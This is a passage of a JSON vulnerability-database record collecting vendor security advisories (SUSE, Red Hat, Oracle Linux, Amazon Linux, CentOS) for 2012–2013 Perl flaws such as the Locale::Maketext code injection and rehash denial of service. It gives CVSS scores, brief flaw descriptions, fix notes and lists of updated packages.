http://search.cpan.org/perldoc?Locale::Maketext\r\n[2] http://foswiki.org/Support/SecurityAlert-CVE-2012-6329\r\n[3] http://foswiki.org/Community/SecurityTaskTeam\r\n[4] http://foswiki.org/Development/SecurityAlertProcess\r\n[5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1666\r\n[6] http://foswiki.org/Extensions/PatchItem12391Contrib\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20407"}], "suse": [{"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n", "edition": 1, "modified": "2013-03-20T14:04:22", "published": "2013-03-20T14:04:22", "id": "OPENSUSE-SU-2013:0502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00038.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:17:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\n\n", "edition": 1, "modified": "2013-03-20T11:05:11", "published": "2013-03-20T11:05:11", "id": "OPENSUSE-SU-2013:0497-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00037.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n * make getgrent work with long group entries\n [bnc#788388]\n", "edition": 1, "modified": "2013-03-13T00:05:41", "published": "2013-03-13T00:05:41", "id": "SUSE-SU-2013:0442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00015.html", "title": "Security update for Perl (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:48:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n", "edition": 1, "modified": "2013-03-13T00:05:35", "published": "2013-03-13T00:05:35", "id": "SUSE-SU-2013:0441-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00014.html", "type": "suse", "title": "Security update for Perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:44", "bulletinFamily": 
"unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
All running Perl programs\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:15", "published": "2013-03-26T04:00:00", "id": "RHSA-2013:0685", "href": "https://access.redhat.com/errata/RHSA-2013:0685", "type": "redhat", "title": "(RHSA-2013:0685) Moderate: perl security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1591", "CVE-2013-1667", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-2266"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way KVM handled guest time updates when the buffer\nthe guest registered by writing to the MSR_KVM_SYSTEM_TIME machine state\nregister (MSR) crossed a page boundary. A privileged guest user could use\nthis flaw to crash the host or, potentially, escalate their privileges,\nallowing them to execute arbitrary code at the host kernel level.\n(CVE-2013-1796)\n\nA potential use-after-free flaw was found in the way KVM handled guest time\nupdates when the GPA (guest physical address) the guest registered by\nwriting to the MSR_KVM_SYSTEM_TIME machine state register (MSR) fell into a\nmovable or removable memory region of the hosting user-space process (by\ndefault, QEMU-KVM) on the host. 
If that memory region is deregistered from\nKVM using KVM_SET_USER_MEMORY_REGION and the allocated virtual memory\nreused, a privileged guest user could potentially use this flaw to escalate\ntheir privileges on the host. (CVE-2013-1797)\n\nA flaw was found in the way KVM emulated IOAPIC (I/O Advanced Programmable\nInterrupt Controller). A missing validation check in the\nioapic_read_indirect() function could allow a privileged guest user to\ncrash the host, or read a substantial portion of host kernel memory.\n(CVE-2013-1798)\n\nAn integer overflow flaw was discovered in one of pixman's manipulation\nroutines. If a remote attacker could trick an application using pixman into\nperforming a certain manipulation, it could cause the application to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2013-1591)\n\nRed Hat would like to thank Andrew Honig of Google for reporting\nCVE-2013-1796, CVE-2013-1797, and CVE-2013-1798.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. 
The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2013-2266 (a bind issue)\n\nCVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667 (perl\nissues)\n\nThis update contains the fixes from the following errata:\n\novirt-node: RHBA-2013:0745\nlibvirt: RHBA-2013:0725\nvdsm: RHBA-2013:0704\nkernel: RHSA-2013:0744\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:42", "published": "2013-04-23T04:00:00", "id": "RHSA-2013:0746", "href": "https://access.redhat.com/errata/RHSA-2013:0746", "type": "redhat", "title": "(RHSA-2013:0746) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "[4:5.10.1-130]\n- Resolves: #915692 - CVE-2012-5526 (newline injection due to improper CRLF\n escaping in Set-Cookie and P3P headers)\n- Resolves: #915692 - CVE-2012-6329 (possible arbitrary code execution via\n Locale::Maketext)\n- Resolves: #915692 - CVE-2013-1667 (DoS in rehashing code)", "edition": 4, "modified": "2013-03-26T00:00:00", "published": "2013-03-26T00:00:00", "id": "ELSA-2013-0685", "href": "http://linux.oracle.com/errata/ELSA-2013-0685.html", "title": "perl security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**Issue Overview:**\n\nA heap overflow flaw was found in Perl. 
If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2012-5195 __](<https://access.redhat.com/security/cve/CVE-2012-5195>))\n\nA denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption. ([CVE-2013-1667 __](<https://access.redhat.com/security/cve/CVE-2013-1667>))\n\nIt was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items. ([CVE-2012-5526 __](<https://access.redhat.com/security/cve/CVE-2012-5526>))\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates. 
([CVE-2012-6329 __](<https://access.redhat.com/security/cve/CVE-2012-6329>))\n\n \n**Affected Packages:** \n\n\nperl\n\n \n**Issue Correction:** \nRun _yum update perl_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perl-suidperl-5.10.1-130.17.amzn1.i686 \n perl-Pod-Escapes-1.04-130.17.amzn1.i686 \n perl-libs-5.10.1-130.17.amzn1.i686 \n perl-version-0.77-130.17.amzn1.i686 \n perl-IO-Compress-Base-2.020-130.17.amzn1.i686 \n perl-Archive-Tar-1.58-130.17.amzn1.i686 \n perl-Test-Harness-3.17-130.17.amzn1.i686 \n perl-Module-Load-0.16-130.17.amzn1.i686 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.i686 \n perl-Archive-Extract-0.38-130.17.amzn1.i686 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.i686 \n perl-IPC-Cmd-0.56-130.17.amzn1.i686 \n perl-CGI-3.51-130.17.amzn1.i686 \n perl-Term-UI-0.20-130.17.amzn1.i686 \n perl-5.10.1-130.17.amzn1.i686 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.i686 \n perl-Package-Constants-0.02-130.17.amzn1.i686 \n perl-Module-Loaded-0.02-130.17.amzn1.i686 \n perl-core-5.10.1-130.17.amzn1.i686 \n perl-Object-Accessor-0.34-130.17.amzn1.i686 \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.i686 \n perl-devel-5.10.1-130.17.amzn1.i686 \n perl-Module-CoreList-2.18-130.17.amzn1.i686 \n perl-Test-Simple-0.92-130.17.amzn1.i686 \n perl-debuginfo-5.10.1-130.17.amzn1.i686 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.i686 \n perl-CPANPLUS-0.88-130.17.amzn1.i686 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.i686 \n perl-IO-Zlib-1.09-130.17.amzn1.i686 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.i686 \n perl-Digest-SHA-5.47-130.17.amzn1.i686 \n perl-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-Params-Check-0.26-130.17.amzn1.i686 \n perl-Time-HiRes-1.9721-130.17.amzn1.i686 \n perl-Module-Build-0.3500-130.17.amzn1.i686 \n perl-Time-Piece-1.15-130.17.amzn1.i686 \n perl-Log-Message-0.02-130.17.amzn1.i686 \n perl-Module-Pluggable-3.90-130.17.amzn1.i686 \n perl-CPAN-1.9402-130.17.amzn1.i686 \n perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.i686 \n 
perl-Log-Message-Simple-0.04-130.17.amzn1.i686 \n perl-Pod-Simple-3.13-130.17.amzn1.i686 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.i686 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.i686 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.i686 \n perl-parent-0.221-130.17.amzn1.i686 \n perl-File-Fetch-0.26-130.17.amzn1.i686 \n \n src: \n perl-5.10.1-130.17.amzn1.src \n \n x86_64: \n perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64 \n perl-Archive-Tar-1.58-130.17.amzn1.x86_64 \n perl-CGI-3.51-130.17.amzn1.x86_64 \n perl-devel-5.10.1-130.17.amzn1.x86_64 \n perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64 \n perl-CPAN-1.9402-130.17.amzn1.x86_64 \n perl-Pod-Escapes-1.04-130.17.amzn1.x86_64 \n perl-parent-0.221-130.17.amzn1.x86_64 \n perl-Module-Loaded-0.02-130.17.amzn1.x86_64 \n perl-Module-Pluggable-3.90-130.17.amzn1.x86_64 \n perl-Module-CoreList-2.18-130.17.amzn1.x86_64 \n perl-Archive-Extract-0.38-130.17.amzn1.x86_64 \n perl-IO-Zlib-1.09-130.17.amzn1.x86_64 \n perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64 \n perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64 \n perl-CPANPLUS-0.88-130.17.amzn1.x86_64 \n perl-Test-Simple-0.92-130.17.amzn1.x86_64 \n perl-suidperl-5.10.1-130.17.amzn1.x86_64 \n perl-debuginfo-5.10.1-130.17.amzn1.x86_64 \n perl-Params-Check-0.26-130.17.amzn1.x86_64 \n perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Term-UI-0.20-130.17.amzn1.x86_64 \n perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64 \n perl-Time-HiRes-1.9721-130.17.amzn1.x86_64 \n perl-Digest-SHA-5.47-130.17.amzn1.x86_64 \n perl-Object-Accessor-0.34-130.17.amzn1.x86_64 \n perl-Log-Message-0.02-130.17.amzn1.x86_64 \n perl-Time-Piece-1.15-130.17.amzn1.x86_64 \n perl-Module-Build-0.3500-130.17.amzn1.x86_64 \n perl-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-libs-5.10.1-130.17.amzn1.x86_64 \n perl-version-0.77-130.17.amzn1.x86_64 \n perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64 \n perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64 \n perl-File-Fetch-0.26-130.17.amzn1.x86_64 \n 
perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64 \n perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64 \n perl-Package-Constants-0.02-130.17.amzn1.x86_64 \n perl-IPC-Cmd-0.56-130.17.amzn1.x86_64 \n perl-core-5.10.1-130.17.amzn1.x86_64 \n perl-Module-Load-0.16-130.17.amzn1.x86_64 \n perl-Test-Harness-3.17-130.17.amzn1.x86_64 \n perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64 \n perl-5.10.1-130.17.amzn1.x86_64 \n perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64 \n perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64 \n perl-Pod-Simple-3.13-130.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-04-04T11:10:00", "published": "2013-04-04T11:10:00", "id": "ALAS-2013-177", "href": "https://alas.aws.amazon.com/ALAS-2013-177.html", "title": "Medium: perl", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-07-17T03:28:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0685\n\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. 
(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. 
All running Perl programs\nmust be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031706.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031707.html\n\n**Affected packages:**\nperl\nperl-Archive-Extract\nperl-Archive-Tar\nperl-CGI\nperl-CPAN\nperl-CPANPLUS\nperl-Compress-Raw-Bzip2\nperl-Compress-Raw-Zlib\nperl-Compress-Zlib\nperl-Digest-SHA\nperl-ExtUtils-CBuilder\nperl-ExtUtils-Embed\nperl-ExtUtils-MakeMaker\nperl-ExtUtils-ParseXS\nperl-File-Fetch\nperl-IO-Compress-Base\nperl-IO-Compress-Bzip2\nperl-IO-Compress-Zlib\nperl-IO-Zlib\nperl-IPC-Cmd\nperl-Locale-Maketext-Simple\nperl-Log-Message\nperl-Log-Message-Simple\nperl-Module-Build\nperl-Module-CoreList\nperl-Module-Load\nperl-Module-Load-Conditional\nperl-Module-Loaded\nperl-Module-Pluggable\nperl-Object-Accessor\nperl-Package-Constants\nperl-Params-Check\nperl-Parse-CPAN-Meta\nperl-Pod-Escapes\nperl-Pod-Simple\nperl-Term-UI\nperl-Test-Harness\nperl-Test-Simple\nperl-Time-HiRes\nperl-Time-Piece\nperl-core\nperl-devel\nperl-libs\nperl-parent\nperl-suidperl\nperl-version\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0685.html", "edition": 5, "modified": "2013-03-26T22:29:30", "published": "2013-03-26T21:05:02", "href": "http://lists.centos.org/pipermail/centos-announce/2013-March/031706.html", "id": "CESA-2013:0685", "title": "perl security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}